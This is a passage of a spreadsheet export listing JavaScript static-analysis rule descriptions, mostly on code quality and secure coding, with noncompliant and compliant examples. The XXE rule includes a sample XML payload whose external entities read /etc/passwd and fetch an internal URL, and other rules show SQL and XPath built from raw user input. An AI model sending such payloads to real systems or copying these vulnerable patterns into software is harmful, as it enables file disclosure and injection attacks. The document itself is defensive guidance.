  &lt;li&gt; when an &lt;code&gt;expect&lt;/code&gt; or &lt;code&gt;should&lt;/code&gt; assertion ends with a &lt;a
  href="https://www.chaijs.com/api/bdd/#method_language-chains"&gt;chainable getters&lt;/a&gt;, such as &lt;code&gt;.that&lt;/code&gt;, or a modifier, such as
  &lt;code&gt;.deep&lt;/code&gt;. &lt;/li&gt;
  &lt;li&gt; when an &lt;code&gt;expect&lt;/code&gt; or &lt;code&gt;should&lt;/code&gt; assertion function, such as &lt;code&gt;.throw&lt;/code&gt;, is not called. &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In such cases, what is intended to be a test doesnâ€™t actually verify anything&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
const assert = require('chai').assert;
const expect = require('chai').expect;
describe("incomplete assertions", function() {
    const value = 42;
    it("uses chai 'assert'", function() {
        assert.fail;  // Noncompliant
    });
    it("uses chai 'expect'", function() {
        expect(1 == 1);  // Noncompliant
        expect(value.toString).to.throw;  // Noncompliant
    });
});
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
const assert = require('chai').assert;
const expect = require('chai').expect;
describe("incomplete assertions", function() {
    const value = 42;
    it("uses chai 'assert'", function() {
        assert.fail();
    });
    it("uses chai 'expect'", function() {
        expect(1).to.equal(1);
        expect(value.toString).throw(TypeError);
    });
});
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S5443</t>
  </si>
  <si>
    <t>Using publicly writable directories is security-sensitive</t>
  </si>
  <si>
    <t>&lt;p&gt;Operating systems have global directories where any user has write access. Those folders are mostly used as temporary storage areas like
&lt;code&gt;/tmp&lt;/code&gt; in Linux based systems. An application manipulating files from these folders is exposed to race conditions on filenames: a malicious
user can try to create a file with a predictable name before the application does. A successful attack can result in other files being accessed,
modified, corrupted or deleted. This risk is even higher if the application runs with elevated permissions.&lt;/p&gt;
&lt;p&gt;In the past, it has led to the following vulnerabilities:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2012-2451"&gt;CVE-2012-2451&lt;/a&gt; &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2015-1838"&gt;CVE-2015-1838&lt;/a&gt; &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This rule raises an issue whenever it detects a hard-coded path to a publicly writable directory like &lt;code&gt;/tmp&lt;/code&gt; (see examples bellow). It
also detects access to environment variables that point to publicly writable directories, e.g., &lt;code&gt;TMP&lt;/code&gt; and &lt;code&gt;TMPDIR&lt;/code&gt;.&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;code&gt;/tmp&lt;/code&gt; &lt;/li&gt;
  &lt;li&gt; &lt;code&gt;/var/tmp&lt;/code&gt; &lt;/li&gt;
  &lt;li&gt; &lt;code&gt;/usr/tmp&lt;/code&gt; &lt;/li&gt;
  &lt;li&gt; &lt;code&gt;/dev/shm&lt;/code&gt; &lt;/li&gt;
  &lt;li&gt; &lt;code&gt;/dev/mqueue&lt;/code&gt; &lt;/li&gt;
  &lt;li&gt; &lt;code&gt;/run/lock&lt;/code&gt; &lt;/li&gt;
  &lt;li&gt; &lt;code&gt;/var/run/lock&lt;/code&gt; &lt;/li&gt;
  &lt;li&gt; &lt;code&gt;/Library/Caches&lt;/code&gt; &lt;/li&gt;
  &lt;li&gt; &lt;code&gt;/Users/Shared&lt;/code&gt; &lt;/li&gt;
  &lt;li&gt; &lt;code&gt;/private/tmp&lt;/code&gt; &lt;/li&gt;
  &lt;li&gt; &lt;code&gt;/private/var/tmp&lt;/code&gt; &lt;/li&gt;
  &lt;li&gt; &lt;code&gt;\Windows\Temp&lt;/code&gt; &lt;/li&gt;
  &lt;li&gt; &lt;code&gt;\Temp&lt;/code&gt; &lt;/li&gt;
  &lt;li&gt; &lt;code&gt;\TMP&lt;/code&gt; &lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Ask Yourself Whether&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; Files are read from or written into a publicly writable folder &lt;/li&gt;
  &lt;li&gt; The application creates files with predictable names into a publicly writable folder &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;There is a risk if you answered yes to any of those questions.&lt;/p&gt;
&lt;h2&gt;Recommended Secure Coding Practices&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; Use a dedicated sub-folder with tightly controlled permissions &lt;/li&gt;
  &lt;li&gt; Use secure-by-design APIs to create temporary files. Such API will make sure:
    &lt;ul&gt;
      &lt;li&gt; The generated filename is unpredictable &lt;/li&gt;
      &lt;li&gt; The file is readable and writable only by the creating user ID &lt;/li&gt;
      &lt;li&gt; The file descriptor is not inherited by child processes &lt;/li&gt;
      &lt;li&gt; The file will be destroyed as soon as it is closed &lt;/li&gt;
    &lt;/ul&gt;  &lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Sensitive Code Example&lt;/h2&gt;
&lt;pre&gt;
const fs = require('fs');
let tmp_file = "/tmp/temporary_file"; // Sensitive
fs.readFile(tmp_file, 'utf8', function (err, data) {
  // ...
});
&lt;/pre&gt;
&lt;pre&gt;
const fs = require('fs');
let tmp_dir = process.env.TMPDIR; // Sensitive
fs.readFile(tmp_dir + "/temporary_file", 'utf8', function (err, data) {
  // ...
});
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
const tmp = require('tmp');
const tmpobj = tmp.fileSync(); // Compliant
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://www.owasp.org/index.php/Top_10-2017_A5-Broken_Access_Control"&gt;OWASP Top 10 2017 Category A5&lt;/a&gt; - Broken Access Control &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure"&gt;OWASP Top 10 2017 Category A3&lt;/a&gt; - Sensitive Data Exposure
  &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/377"&gt;MITRE, CWE-377&lt;/a&gt; - Insecure Temporary File &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/379"&gt;MITRE, CWE-379&lt;/a&gt; - Creation of Temporary File in Directory with Incorrect Permissions
  &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.owasp.org/index.php/Insecure_Temporary_File"&gt;OWASP, Insecure Temporary File&lt;/a&gt; &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S1764</t>
  </si>
  <si>
    <t>Identical expressions should not be used on both sides of a binary operator</t>
  </si>
  <si>
    <t>&lt;p&gt;Using the same value on either side of a binary operator is almost always a mistake. In the case of logical operators, it is either a copy/paste
error and therefore a bug, or it is simply wasted code, and should be simplified. In the case of bitwise operators and most binary mathematical
operators, having the same value on both sides of an operator yields predictable results, and should be simplified.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
if (a == b &amp;amp;&amp;amp; a == b) { // if the first one is true, the second one is too
  doX();
}
if (a &amp;gt; a) { // always false
  doW();
}
var j = 5 / 5; //always 1
var k = 5 - 5; //always 0
&lt;/pre&gt;
&lt;h2&gt;Exceptions&lt;/h2&gt;
&lt;p&gt;The specific case of testing one variable against itself is a valid test for &lt;code&gt;NaN&lt;/code&gt; and is therefore ignored.&lt;/p&gt;
&lt;p&gt;Similarly, left-shifting 1 onto 1 is common in the construction of bit masks, and is ignored.&lt;/p&gt;
&lt;p&gt;Moreover comma operator &lt;code&gt;,&lt;/code&gt; and &lt;code&gt;instanceof&lt;/code&gt; operator are ignored as there are use-cases when there usage is valid.&lt;/p&gt;
&lt;pre&gt;
if (f !== f) { // test for NaN value
  console.log("f is NaN");
}
var i = 1 &amp;lt;&amp;lt; 1; // Compliant
var j = a &amp;lt;&amp;lt; a; // Noncompliant
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; {rule:javascript:S1656} - Implements a check on &lt;code&gt;=&lt;/code&gt;. &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S5689</t>
  </si>
  <si>
    <t>Disclosing fingerprints from web application technologies is security-sensitive</t>
  </si>
  <si>
    <t>&lt;p&gt;Disclosing technology fingerprints allows an attacker to gather information about the technologies used to develop the web application and to
perform relevant security assessments more quickly (like the identification of known vulnerable components).&lt;/p&gt;
&lt;h2&gt;Ask Yourself Whether&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; The &lt;code&gt;x-powered-by&lt;/code&gt; HTTP header or similar is used by the application. &lt;/li&gt;
  &lt;li&gt; Technologies used by the application are confidential and should not be easily guessed. &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;There is a risk if you answered yes to any of these questions.&lt;/p&gt;
&lt;h2&gt;Recommended Secure Coding Practices&lt;/h2&gt;
&lt;p&gt;Itâ€™s recommended to not disclose technologies used on a website, with &lt;code&gt;x-powered-by&lt;/code&gt; HTTP header for example.&lt;/p&gt;
&lt;p&gt;In addition, itâ€™s better to completely disable this HTTP header rather than setting it a random value.&lt;/p&gt;
&lt;h2&gt;Sensitive Code Example&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://www.npmjs.com/package/express"&gt;Express.js&lt;/a&gt; name is disclosed by default into the &lt;code&gt;x-powered-by&lt;/code&gt; HTTP header:&lt;/p&gt;
&lt;pre&gt;
let express = require('express');
let app = express(); // Sensitive
app.get('/', function (req, res) {
  res.send('hello')
});
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;p&gt;&lt;code&gt;x-powered-by&lt;/code&gt; HTTP header should be disabled in &lt;a href="https://www.npmjs.com/package/express"&gt;Express.js&lt;/a&gt; with
&lt;code&gt;app.disable&lt;/code&gt; or with helmet &lt;a href="https://www.npmjs.com/package/helmet"&gt;hidePoweredBy&lt;/a&gt; middleware:&lt;/p&gt;
&lt;pre&gt;
let express = require('express');
let app1 = express();  // Compliant
app1.disable("x-powered-by");
let helmet = require("helmet");
let app2 = express(); // Compliant
app2.use(helmet.hidePoweredBy());
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a
  href="https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/01-Information_Gathering/08-Fingerprint_Web_Application_Framework.html"&gt;OWASP Testing Guide - OTG-INFO-008&lt;/a&gt; - Fingerprint Web Application Framework &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.owasp.org/index.php/Top_10-2017_A6-Security_Misconfiguration"&gt;OWASP Top 10 2017 Category A6&lt;/a&gt; - Security
  Misconfiguration &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/200.html"&gt;MITRE, CWE-200&lt;/a&gt; - Information Exposure &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S6080</t>
  </si>
  <si>
    <t>Mocha timeout should be disabled by setting it to "0".</t>
  </si>
  <si>
    <t>&lt;p&gt;Starting from Mocha v3.0.0, calling &lt;code&gt;this.timeout(X)&lt;/code&gt; with &lt;code&gt;X&lt;/code&gt; greater than the &lt;a
href="https://developer.mozilla.org/en-US/docs/Web/API/WindowOrWorkerGlobalScope/setTimeout#Maximum_delay_value"&gt;maximum delay value&lt;/a&gt;
(2,147,483,647 ms) &lt;a href="https://mochajs.org/#hook-level"&gt;will cause the timeout to be disabled&lt;/a&gt;. This might not be what the developer intended.
If the goal is really to disable the timeout, &lt;code&gt;this.timeout(0)&lt;/code&gt; should be used instead.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
describe("testing this.timeout", function() {
  it("unexpectedly disables the timeout", function(done) {
    this.timeout(2147483648); // Noncompliant
  });
});
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
describe("testing this.timeout", function() {
  it("doesn't disable the timeout", function(done) {
    this.timeout(1000);
  });
});
&lt;/pre&gt;
&lt;p&gt;Or if you meant to disable the timeout&lt;/p&gt;
&lt;pre&gt;
describe("testing this.timeout", function() {
  it("disables the timeout as expected", function(done) {
    this.timeout(0);
  });
});
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://mochajs.org/#hook-level"&gt;Mocha documentation&lt;/a&gt; &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S1516</t>
  </si>
  <si>
    <t>Multiline string literals should not be used</t>
  </si>
  <si>
    <t>&lt;p&gt;Continuing a string across a linebreak is supported in most script engines, but it is not a part of ECMAScript. Additionally, the whitespace at the
beginning of each line canâ€™t be safely stripped at compile time, and any whitespace after the slash will result in tricky errors.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
var myString = 'A rather long string of English text, an error message \
                actually that just keeps going and going -- an error \
                message to make the Energizer bunny blush (right through \
                those Schwarzenegger shades)! Where was I? Oh yes, \
                you\'ve got an error and all the extraneous whitespace is \
                just gravy.  Have a nice day.';  // Noncompliant
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
var myString = 'A rather long string of English text, an error message ' +
    'actually that just keeps going and going -- an error ' +
    'message to make the Energizer bunny blush (right through ' +
    'those Schwarzenegger shades)! Where was I? Oh yes, ' +
    'you\'ve got an error and all the extraneous whitespace is ' +
    'just gravy.  Have a nice day.';
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S3499</t>
  </si>
  <si>
    <t>Shorthand object properties should be grouped at the beginning or end of an object declaration</t>
  </si>
  <si>
    <t>&lt;p&gt;Grouping all the shorthand declarations together in an object makes the declaration as a whole more readable. This rule accepts shorthand
declarations grouped at either the beginning or end of an object.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
let obj1 = {
  foo,
  a: 1,
  color,  // Noncompliant
  b: 2,
  judyGarland  // Noncompliant
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
let obj1 = {
  foo,
  color,
  judyGarland,
  a: 1,
  b: 2
}
&lt;/pre&gt;
&lt;p&gt;or&lt;/p&gt;
&lt;pre&gt;
let obj1 = {
  a: 1,
  b: 2,
  foo,
  color,
  judyGarland
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S1874</t>
  </si>
  <si>
    <t>Deprecated APIs should not be used</t>
  </si>
  <si>
    <t>&lt;p&gt;Once deprecated, classes, and interfaces, and their members should be avoided, rather than used, inherited or extended. Deprecation is a warning
that the class or interface has been superseded, and will eventually be removed. The deprecation period allows you to make a smooth transition away
from the aging, soon-to-be-retired technology.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
export interface LanguageService {
  /**
  * @deprecated Use getEncodedSyntacticClassifications instead.
  */
  getSyntacticClassifications(fileName: string, span: TextSpan): ClassifiedSpan[];
}
const syntacticClassifications = getLanguageService().getSyntacticClassifications(file, span); // Noncompliant
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/477.html"&gt;MITRE, CWE-477&lt;/a&gt; - Use of Obsolete Functions &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S3723</t>
  </si>
  <si>
    <t>Trailing commas should be used</t>
  </si>
  <si>
    <t>&lt;p&gt;Modern browsers ignore unneeded, trailing commas, so there are no negatives to having them unless youâ€™re supporting an IE 8 application. Since they
make adding new properties simpler, their use is preferred. This rule raises an issue when the last item in a multiline construct (array or object
literal, import or export statement, function declaration or call) does not end with a trailing comma and does not lie on the same line as the closing
curly brace, bracket or parenthesis.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
var joe = {
  fname: "Joe",
  lname: "Smith"      // Noncompliant
};
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
var joe = {
  fname: "Joe",
  lname: "Smith",    // OK
};
var joe = {
  fname: "Joe",
  lname: "Smith"};   // OK
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S2755</t>
  </si>
  <si>
    <t>XML parsers should not be vulnerable to XXE attacks</t>
  </si>
  <si>
    <t>&lt;p&gt;XML standard allows the use of entities, declared in the DOCTYPE of the document, which can be &lt;a
href="https://www.w3.org/TR/xml/#sec-internal-ent"&gt;internal&lt;/a&gt; or &lt;a href="https://www.w3.org/TR/xml/#sec-external-ent"&gt;external&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;When parsing the XML file, the content of the external entities is retrieved from an external storage such as the file system or network, which may
lead, if no restrictions are put in place, to arbitrary file disclosures or &lt;a
href="https://www.owasp.org/index.php/Server_Side_Request_Forgery"&gt;server-side request forgery (SSRF)&lt;/a&gt; vulnerabilities.&lt;/p&gt;
&lt;pre&gt;
&amp;lt;?xml version="1.0" encoding="utf-8"?&amp;gt;
&amp;lt;!DOCTYPE person [
  &amp;lt;!ENTITY file SYSTEM "file:///etc/passwd"&amp;gt;
  &amp;lt;!ENTITY ssrf SYSTEM "https://internal.network/sensitive_information"&amp;gt;
]&amp;gt;
&amp;lt;person&amp;gt;
  &amp;lt;name&amp;gt;&amp;amp;file;&amp;lt;/name&amp;gt;
  &amp;lt;city&amp;gt;&amp;amp;ssrf;&amp;lt;/city&amp;gt;
  &amp;lt;age&amp;gt;18&amp;lt;/age&amp;gt;
&amp;lt;/person&amp;gt;
&lt;/pre&gt;
&lt;p&gt;Itâ€™s recommended to limit resolution of external entities by using one of these solutions:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; If DOCTYPE is not necessary, completely disable all DOCTYPE declarations. &lt;/li&gt;
  &lt;li&gt; If external entities are not necessary, completely disable their declarations. &lt;/li&gt;
  &lt;li&gt; If external entities are necessary then:
    &lt;ul&gt;
      &lt;li&gt; Use XML processor features, if available, to authorize only required protocols (eg: https). &lt;/li&gt;
      &lt;li&gt; And use an entity resolver (and optionally an XML Catalog) to resolve only trusted entities. &lt;/li&gt;
    &lt;/ul&gt;  &lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://github.com/libxmljs/libxmljs"&gt;libxmljs&lt;/a&gt; module:&lt;/p&gt;
&lt;pre&gt;
const libxmljs = require("libxmljs");
var fs = require('fs');
var xml = fs.readFileSync('xxe.xml', 'utf8');
var xmlDoc = libxmljs.parseXmlString(xml, { noblanks: true, noent: true, nocdata: true }); // Noncompliant: noent set to true
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://github.com/libxmljs/libxmljs"&gt;libxmljs&lt;/a&gt; module:&lt;/p&gt;
&lt;pre&gt;
const libxmljs = require("libxmljs");
var fs = require('fs');
var xml = fs.readFileSync('xxe.xml', 'utf8');
var xmlDoc = libxmljs.parseXmlString(xml); // Compliant: noent set to false by default
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://www.owasp.org/index.php/Top_10-2017_A4-XML_External_Entities_(XXE)"&gt;OWASP Top 10 2017 Category A4&lt;/a&gt; - XML External Entities
  (XXE) &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html"&gt;OWASP XXE Prevention Cheat Sheet&lt;/a&gt;
  &lt;/li&gt;
  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/611.html"&gt;MITRE, CWE-611&lt;/a&gt; - Information Exposure Through XML External Entity Reference &lt;/li&gt;
  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/827.html"&gt;MITRE, CWE-827&lt;/a&gt; - Improper Control of Document Type Definition &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S4817</t>
  </si>
  <si>
    <t>Executing XPath expressions is security-sensitive</t>
  </si>
  <si>
    <t>&lt;p&gt;Executing XPATH expressions is security-sensitive. It has led in the past to the following vulnerabilities:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6272"&gt;CVE-2016-6272&lt;/a&gt; &lt;/li&gt;
  &lt;li&gt; &lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9149"&gt;CVE-2016-9149&lt;/a&gt; &lt;/li&gt;
  &lt;li&gt; &lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4837"&gt;CVE-2012-4837&lt;/a&gt; &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;User provided data such as URL parameters should always be considered as untrusted and tainted. Constructing XPath expressions directly from
tainted data enables attackers to inject specially crafted values that changes the initial meaning of the expression itself. Successful XPath
injections attacks can read sensitive information from the XML document.&lt;/p&gt;
&lt;h2&gt;Ask Yourself Whether&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; the XPATH expression might contain some unsafe input coming from a user. &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;You are at risk if you answered yes to this question.&lt;/p&gt;
&lt;h2&gt;Recommended Secure Coding Practices&lt;/h2&gt;
&lt;p&gt;Sanitize any user input before using it in an XPATH expression.&lt;/p&gt;
&lt;h2&gt;Sensitive Code Example&lt;/h2&gt;
&lt;pre&gt;
// === Server side ===
var xpath = require('xpath');
var xmldom = require('xmldom');
var doc = new xmldom.DOMParser().parseFromString(xml);
var nodes = xpath.select(userinput, doc); // Sensitive
var node = xpath.select1(userinput, doc); // Sensitive
&lt;/pre&gt;
&lt;pre&gt;
// === Client side ===
// Chrome, Firefox, Edge, Opera, and Safari use the evaluate() method to select nodes:
var nodes = document.evaluate(userinput, xmlDoc, null, XPathResult.ANY_TYPE, null); // Sensitive
// Internet Explorer uses its own methods to select nodes:
var nodes = xmlDoc.selectNodes(userinput); // Sensitive
var node = xmlDoc.SelectSingleNode(userinput); // Sensitive
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://www.owasp.org/index.php/Top_10-2017_A1-Injection"&gt;OWASP Top 10 2017 Category A1&lt;/a&gt; - Injection &lt;/li&gt;
  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/643"&gt;MITRE, CWE-643&lt;/a&gt; - Improper Neutralization of Data within XPath Expressions &lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Deprecated&lt;/h2&gt;
&lt;p&gt;This rule is deprecated, and will eventually be removed.&lt;/p&gt;</t>
  </si>
  <si>
    <t>javascript:S2077</t>
  </si>
  <si>
    <t>Formatting SQL queries is security-sensitive</t>
  </si>
  <si>
    <t>&lt;p&gt;Formatted SQL queries can be difficult to maintain, debug and can increase the risk of SQL injection when concatenating untrusted values into the
query. However, this rule doesnâ€™t detect SQL injections (unlike rule {rule:javascript:S3649}), the goal is only to highlight complex/formatted
queries.&lt;/p&gt;
&lt;h2&gt;Ask Yourself Whether&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; Some parts of the query come from untrusted values (like user inputs). &lt;/li&gt;
  &lt;li&gt; The query is repeated/duplicated in other parts of the code. &lt;/li&gt;
  &lt;li&gt; The application must support different types of relational databases. &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;There is a risk if you answered yes to any of those questions.&lt;/p&gt;
&lt;h2&gt;Recommended Secure Coding Practices&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; Use &lt;a href="https://www.owasp.org/index.php/Query_Parameterization_Cheat_Sheet"&gt;parameterized queries, prepared statements, or stored
  procedures&lt;/a&gt; and bind variables to SQL query parameters. &lt;/li&gt;
  &lt;li&gt; Consider using ORM frameworks if there is a need to have an abstract layer to access data. &lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Sensitive Code Example&lt;/h2&gt;
&lt;pre&gt;
// === MySQL ===
const mysql = require('mysql');
const mycon = mysql.createConnection({ host: host, user: user, password: pass, database: db });
mycon.connect(function(err) {
  mycon.query('SELECT * FROM users WHERE id = ' + userinput, (err, res) =&amp;gt; {}); // Sensitive
});
// === PostgreSQL ===
const pg = require('pg');
const pgcon = new pg.Client({ host: host, user: user, password: pass, database: db });
pgcon.connect();
pgcon.query('SELECT * FROM users WHERE id = ' + userinput, (err, res) =&amp;gt; {}); // Sensitive
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
// === MySQL ===
const mysql = require('mysql');
const mycon = mysql.createConnection({ host: host, user: user, password: pass, database: db });
mycon.connect(function(err) {
  mycon.query('SELECT name FROM users WHERE id = ?', [userinput], (err, res) =&amp;gt; {});
});
// === PostgreSQL ===
const pg = require('pg');
const pgcon = new pg.Client({ host: host, user: user, password: pass, database: db });
pgcon.connect();
pgcon.query('SELECT name FROM users WHERE id = $1', [userinput], (err, res) =&amp;gt; {});
&lt;/pre&gt;
&lt;h2&gt;Exceptions&lt;/h2&gt;
&lt;p&gt;This ruleâ€™s current implementation does not follow variables. It will only detect SQL queries which are formatted directly in the function
call.&lt;/p&gt;
&lt;pre&gt;
const sql = 'SELECT * FROM users WHERE id = ' + userinput;
mycon.query(sql, (err, res) =&amp;gt; {}); // Sensitive but no issue is raised.
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://www.owasp.org/index.php/Top_10-2017_A1-Injection"&gt;OWASP Top 10 2017 Category A1&lt;/a&gt; - Injection &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/89"&gt;MITRE, CWE-89&lt;/a&gt; - Improper Neutralization of Special Elements used in an SQL Command
  &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/564.html"&gt;MITRE, CWE-564&lt;/a&gt; - SQL Injection: Hibernate &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/20.html"&gt;MITRE, CWE-20&lt;/a&gt; - Improper Input Validation &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/943.html"&gt;MITRE, CWE-943&lt;/a&gt; - Improper Neutralization of Special Elements in Data Query Logic
  &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.sans.org/top25-software-errors/#cat1"&gt;SANS Top 25&lt;/a&gt; - Insecure Interaction Between Components &lt;/li&gt;
  &lt;li&gt; Derived from FindSecBugs rules &lt;a href="https://h3xstream.github.io/find-sec-bugs/bugs.htm#SQL_INJECTION_JPA"&gt;Potential SQL/JPQL Injection
  (JPA)&lt;/a&gt;, &lt;a href="https://h3xstream.github.io/find-sec-bugs/bugs.htm#SQL_INJECTION_JDO"&gt;Potential SQL/JDOQL Injection (JDO)&lt;/a&gt;, &lt;a
  href="https://h3xstream.github.io/find-sec-bugs/bugs.htm#SQL_INJECTION_HIBERNATE"&gt;Potential SQL/HQL Injection (Hibernate)&lt;/a&gt; &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S2871</t>
  </si>
  <si>
    <t>A compare function should be provided when using "Array.prototype.sort()"</t>
  </si>
  <si>
    <t>&lt;p&gt;The default sort order is alphabetic, rather than numeric, regardless of the types in the array. Specifically, even if an array contains only
numbers, all values in it will be converted to strings and sorted lexicographically, for an order like this: 1, 15, 2, 20, 5.&lt;/p&gt;
&lt;p&gt;Fortunately the &lt;code&gt;sort&lt;/code&gt; method allows you to pass an optional compare function to specify the sort order. When a compare function is
supplied, the returned order depends on the return value of the compare function.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
var myarray = [80, 3, 9, 34, 23, 5, 1];
myarray.sort();
console.log(myarray); // outputs: [1, 23, 3, 34, 5, 80, 9]
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
var myarray = [80, 3, 9, 34, 23, 5, 1];
myarray.sort((a, b) =&amp;gt; (a - b));
console.log(myarray); // outputs: [1, 3,  5, 9, 23, 34, 80]
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S121</t>
  </si>
  <si>
    <t>Control structures should use curly braces</t>
  </si>
  <si>
    <t>&lt;p&gt;While not technically incorrect, the omission of curly braces can be misleading, and may lead to the introduction of errors during maintenance.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
if (condition)  // Noncompliant
  executeSomething();
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
if (condition) {
  executeSomething();
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S4139</t>
  </si>
  <si>
    <t>"for in" should not be used with iterables</t>
  </si>
  <si>
    <t>&lt;p&gt;If you have an iterable, such as an array, set, or list, your best option for looping through its values is the &lt;code&gt;for of&lt;/code&gt; syntax. Use
&lt;code&gt;for in&lt;/code&gt; and youâ€™ll iterate the properties, rather than the values.&lt;/p&gt;
